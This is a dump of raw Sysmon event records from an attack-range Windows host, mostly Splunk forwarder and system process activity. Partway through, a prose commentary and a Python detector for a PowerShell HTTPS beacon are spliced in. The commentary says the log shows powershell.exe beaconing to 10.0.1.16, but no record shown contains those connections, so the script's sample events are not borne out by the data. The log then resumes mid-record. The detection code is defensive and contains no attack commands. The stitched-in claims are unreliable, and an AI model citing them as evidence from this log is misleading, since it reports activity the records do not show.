13:12:37.884{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496536Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:12:37.884{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496535Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:37.884{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-9FC5-6140-5D56-04000000C801}5616C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036496534Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:37.884{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-9FC5-6140-5D56-04000000C801}5616C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036496533Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:37.870{B81B27B7-9FC5-6140-5D56-04000000C801}5616C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036496532Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:37.001{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=50F6228348177D0088597956D6AFA1B4,SHA256=6AD4065DC6A32A5FFE0B75C1384A4E2E53D1A9F3C99716A8DC763C160FFAD4C3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
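The records above are Sysmon events (IDs 1, 3, 10 and 23) from win-host-987 with their XML tags stripped, so the fields run together. The one thing in this stretch a detection engineer would pull out is powershell.exe (PID 6940, user ATTACKRANGE\REED_SCHMIDT) opening HTTPS connections to 10.0.1.16 every few seconds (13:12:55.057, 13:12:59.072, 13:13:05.084) while the Splunk Universal Forwarder's own binaries talk to 10.0.1.12 on 8089 and 8000. What follows is an added example, not part of this page or of Splunk's attack_data: it parses Sysmon events in their original XML form, rebuilt here from field values visible in the records above (Provider GUID, TimeCreated and Security SID omitted), and flags the beacon. The forwarder allowlist, the Splunk server address and the list of shell interpreters are assumptions made for the example.

```python
"""Parse Sysmon XML events and flag a PowerShell beacon amid Splunk forwarder noise.
Added example; the sample events are rebuilt from values in the records above."""
import xml.etree.ElementTree as ET
from collections import defaultdict
from datetime import datetime

UF = r'C:\Program Files\SplunkUniversalForwarder'
# Assumption: the only processes expected to talk to the Splunk server from this host.
SPLUNK_UF_IMAGES = {UF + r'\bin\splunkd.exe',
                    UF + r'\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe'}
SPLUNK_SERVER = '10.0.1.12'        # seen on ports 8089 and 8000 in the records above
SHELLS = {'powershell.exe', 'pwsh.exe', 'cmd.exe'}   # assumption: interpreters worth watching


def _local(tag):
    """Strip the XML namespace from an element tag."""
    return tag.rsplit('}', 1)[-1]


def parse_sysmon_event(xml_text):
    """Flatten one <Event> into a dict of System fields plus EventData Name=value pairs."""
    ev = {}
    for section in ET.fromstring(xml_text):
        for field in section:
            if _local(section.tag) == 'EventData':
                ev[field.get('Name')] = (field.text or '').strip()
            elif field.text and field.text.strip():
                ev[_local(field.tag)] = field.text.strip()
    return ev


def flag_network_events(events, min_hits=3):
    """Initiated connections (EID 3) from a shell interpreter that are not forwarder
    traffic to the Splunk server, grouped by (image, pid, dst ip, dst port) and kept
    only when the same destination was contacted at least `min_hits` times."""
    groups = defaultdict(list)
    for ev in events:
        if ev.get('EventID') != '3' or ev.get('Initiated') != 'true':
            continue
        image = ev['Image']
        if image in SPLUNK_UF_IMAGES and ev['DestinationIp'] == SPLUNK_SERVER:
            continue
        if image.rsplit('\\', 1)[-1].lower() not in SHELLS:
            continue
        key = (image, ev['ProcessId'], ev['DestinationIp'], ev['DestinationPort'])
        groups[key].append(datetime.strptime(ev['UtcTime'], '%Y-%m-%d %H:%M:%S.%f'))
    return {k: sorted(v) for k, v in groups.items() if len(v) >= min_hits}


def beacon_intervals(timestamps):
    """Seconds between consecutive connections; a narrow spread is what a beacon looks like."""
    return [round((b - a).total_seconds(), 3) for a, b in zip(timestamps, timestamps[1:])]


# --- constructed sample input (field values taken from the records above) --------------
def _event(event_id, record_id, data):
    fields = ''.join(f'<Data Name="{k}">{v}</Data>' for k, v in data.items())
    return (f'<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System>'
            f'<EventID>{event_id}</EventID><EventRecordID>{record_id}</EventRecordID>'
            f'<Channel>Microsoft-Windows-Sysmon/Operational</Channel>'
            f'<Computer>win-host-987.attackrange.local</Computer></System>'
            f'<EventData>{fields}</EventData></Event>')


def _netconn(record_id, utc, pid, image, user, sport, dip, dhost, dport, dportname):
    return _event(3, record_id, {
        'RuleName': '-', 'UtcTime': utc, 'ProcessId': pid, 'Image': image, 'User': user,
        'Protocol': 'tcp', 'Initiated': 'true', 'SourceIsIpv6': 'false',
        'SourceIp': '10.0.1.15', 'SourceHostname': 'win-host-987.attackrange.local',
        'SourcePort': sport, 'SourcePortName': '-', 'DestinationIsIpv6': 'false',
        'DestinationIp': dip, 'DestinationHostname': dhost,
        'DestinationPort': dport, 'DestinationPortName': dportname})


PS = r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
SAMPLE_EVENTS = [
    _event(1, 36496491, {   # splunkd.exe spawning its helper, benign forwarder activity
        'RuleName': '-', 'UtcTime': '2021-09-14 13:12:24.124', 'ProcessId': '2908',
        'Image': UF + r'\bin\splunk-powershell.exe', 'User': r'NT AUTHORITY\SYSTEM',
        'ParentProcessId': '2076', 'ParentImage': UF + r'\bin\splunkd.exe'}),
    _netconn(36496513, '2021-09-14 13:12:55.057', '6940', PS, r'ATTACKRANGE\REED_SCHMIDT',
             '50416', '10.0.1.16', 'ip-10-0-1-16.us-west-2.compute.internal', '443', 'https'),
    _netconn(36496515, '2021-09-14 13:12:55.918', '3616',
             UF + r'\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe',
             r'NT AUTHORITY\SYSTEM', '50417', '10.0.1.12', '-', '8000', '-'),
    _netconn(36496519, '2021-09-14 13:12:59.072', '6940', PS, r'ATTACKRANGE\REED_SCHMIDT',
             '50418', '10.0.1.16', 'ip-10-0-1-16.us-west-2.compute.internal', '443', 'https'),
    _netconn(36496526, '2021-09-14 13:13:04.084', '2076', UF + r'\bin\splunkd.exe',
             r'NT AUTHORITY\SYSTEM', '50420', '10.0.1.12', '-', '8089', '-'),
    _netconn(36496530, '2021-09-14 13:13:05.084', '6940', PS, r'ATTACKRANGE\REED_SCHMIDT',
             '50421', '10.0.1.16', 'ip-10-0-1-16.us-west-2.compute.internal', '443', 'https'),
]

if __name__ == '__main__':
    events = [parse_sysmon_event(x) for x in SAMPLE_EVENTS]
    for (image, pid, dip, dport), ts in flag_network_events(events).items():
        print(f'{image} pid={pid} -> {dip}:{dport} x{len(ts)} intervals={beacon_intervals(ts)}')
```

Run against the six sample events, only the powershell.exe group survives: three hits to 10.0.1.16:443 with gaps of 4.015 s and 6.012 s, while splunkd.exe and streamfwd.exe are dropped by the allowlist and the EID 1 record is ignored by the network check. The allowlist is deliberately image-plus-destination, so a forwarder binary reaching anything other than the Splunk server still surfaces; tune `min_hits` to the window you query rather than leaving it at three.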
23542300x800000000000000036496554Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:38.885{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1043BBAF824389D1F3219878E9B19B10,SHA256=3A477122D73B91CB4E5726AA06333961D22976F068C391629E630D096DC3E666,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496553Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:38.885{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=591766723EBC211F8C6655F95E970B1A,SHA256=347CF4B3523E2C364B0638F71D09D902CEA5FBF8B6EA9DBC5E5B20939DA7CDBC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036496552Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:38.738{B81B27B7-9FC6-6140-5E56-04000000C801}67407116C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496551Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:12:38.570{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-9FC6-6140-5E56-04000000C801}6740C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496550Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:38.570{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496549Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:12:38.570{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496548Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:38.570{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496547Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:12:38.570{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496546Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:38.570{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-9FC6-6140-5E56-04000000C801}6740C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036496545Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:38.554{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-9FC6-6140-5E56-04000000C801}6740C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036496544Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:38.555{B81B27B7-9FC6-6140-5E56-04000000C801}6740C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000036496543Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:38.037{B81B27B7-9FC5-6140-5D56-04000000C801}56162756C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000036496542Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:38.015{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CCE7F5C68ECBA291C87372A680362A1F,SHA256=E6EBBBA3453F8ED3A8435A34375038F6DAF847540354BA59B6E304C1EF35F2B7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496541Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:07.916{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50422-false10.0.1.12-8000- 23542300x800000000000000036496567Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:39.621{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=1ED810ACBF5A6460822CB3BB6B268783,SHA256=1930848F6DDE4A0FEDC77F392E84B8758C6F7E7837363914D0507DDA5E4094D7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036496566Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D8569F3D9F7F8D2F6BBE8C0F669C481,SHA256=09A08BD4BB244C96AE384C906E95C65E57D0E079F961B45A53C7237697A4718B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496634Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:08.945{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=79787A6E962541CB81C2170AA779F7C7,SHA256=AF7434E4D24E71D90E10B422D2610CC0F6AA00FEE637DC49597C24792A16F11A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496633Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:08.945{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2031E7289D1A8A0FB276601AFE733AB7,SHA256=B1F226AB84D972DF72DCFCADB880DFFD9E29FB28D5AFB126F270D487A413468C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496632Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:08.745{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6610224E76BFB72009FADE2994220F1B,SHA256=D38CD4894462C99EBED0E4F46F6FD53A5B3121890E1E13BBD71BD58B89F6A834,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
10341000x800000000000000036496631Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:08.645{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-9FE4-6140-6156-04000000C801}912C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000036496630Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:13:08.645{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=C224A8DB84351308B419A238038F6E13,SHA256=418BCD558AF28F42394A30328D7FA26AAB284860A9B1334FD30A07E0BA5A06A2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036496629Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:13:08.645{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496628Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 